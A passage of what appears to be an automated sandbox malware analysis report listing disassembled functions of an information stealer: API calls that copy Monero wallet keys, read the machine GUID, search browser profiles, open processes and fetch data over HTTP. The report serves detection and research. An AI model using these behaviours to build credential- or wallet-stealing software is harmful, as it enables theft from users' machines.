                                                                                • CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00422360,?,?,?,0042234B,00000000,?,\Monero\wallet.keys,?), ref: 00401E04
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401E7F
                                                                                • memset.MSVCRT ref: 00401E9D
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Filelstrcpy$lstrcat$AllocCreateHeaplstrlenmemset$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                • API String ID: 2725398440-218353709
                                                                                • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                                • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                                Function 00410071 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410076
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                • wsprintfA.USER32 ref: 00410132
                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                • String ID: - $%s\%s$?
                                                                                • API String ID: 404191982-3278919252
                                                                                • Opcode ID: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                • Instruction ID: 7ab7514c44e0da1f2f7805acf3a1e45dd26abe84cf75324248915fb0e6202ea1
                                                                                • Opcode Fuzzy Hash: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                • Instruction Fuzzy Hash: 087102B190021DEEDF11EBE1CD84EEEBBB9BB18304F50417AE905B2151DB785A88CB65
                                                                                Function 0040F689 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040F68E
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                                • memset.MSVCRT ref: 0040F708
                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                                  • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                  • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                                Strings
                                                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                                • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                • API String ID: 3050127167-1622206642
                                                                                • Opcode ID: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                • Instruction ID: d92978c317b697945912aa173a1e05ead718c9e6d1350f194c4815b503896aae
                                                                                • Opcode Fuzzy Hash: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                • Instruction Fuzzy Hash: A8517E71900219AEDB20EB94DC81AEEBBB9EF04314F20017FF114B66C1DB795E88CB59
                                                                                Function 004104DD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004104E2
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                • wsprintfA.USER32 ref: 004105AD
                                                                                • lstrcat.KERNEL32(00000000,004262A0), ref: 004105BC
                                                                                  • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                  • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                  • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                • String ID: :\$C
                                                                                • API String ID: 688099012-3309953409
                                                                                • Opcode ID: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                • Instruction ID: 84e118196ac0f38cbb6e09dfb40efd972d04435529832d229da92da0b26732ed
                                                                                • Opcode Fuzzy Hash: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                • Instruction Fuzzy Hash: 8E418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA785A48CBB5
                                                                                Function 00413118 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041311D
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                  • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                  • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                  • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                  • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                  • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                  • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                  • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                • API String ID: 3807055897-1526165396
                                                                                • Opcode ID: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                • Instruction ID: 555d10d1ffafafdd123518b884250a5375e6a4b62cd9d48d02a2f87644db10f1
                                                                                • Opcode Fuzzy Hash: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                • Instruction Fuzzy Hash: 7141A6B1900258EACB11FFA1D956FDDB7B4AF18708F10007FE90173182DB386B488A6A
                                                                                Function 0040ED08 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                  • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                                • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy
                                                                                • String ID: Stable\$ Stable\$firefox
                                                                                • API String ID: 2120869262-2697854757
                                                                                • Opcode ID: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                • Instruction ID: 1d26c69091b310833a01da009a7ea8e67b8bedb29d0866ac6f751b535dc35178
                                                                                • Opcode Fuzzy Hash: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                • Instruction Fuzzy Hash: 70E19171D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6
                                                                                Function 00404DCA Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00404DCF
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                • String ID:
                                                                                • API String ID: 2737972104-0
                                                                                • Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                • Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
                                                                                • Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                • Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5
                                                                                Function 00410415 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041043B
                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                • RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                • CharToOemA.USER32(?,?), ref: 00410493
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharOpenQueryValuememset
                                                                                • String ID: MachineGuid$NeB$SOFTWARE\Microsoft\Cryptography
                                                                                • API String ID: 1728412123-1973151993
                                                                                • Opcode ID: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                • Instruction ID: e049fcdf3dccc2042a1c1aa5727c33f1d227b0b17948d6a14ccc4f9ac1de0051
                                                                                • Opcode Fuzzy Hash: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                • Instruction Fuzzy Hash: 8A014F7590421DFFEB10DB90DC89FEAB77CEB18708F5000A5B644E2051EAB45FC88B60
                                                                                Function 0041695F Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 654networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00416964
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                                  • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32(75900000,00416AAC), ref: 00417659
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
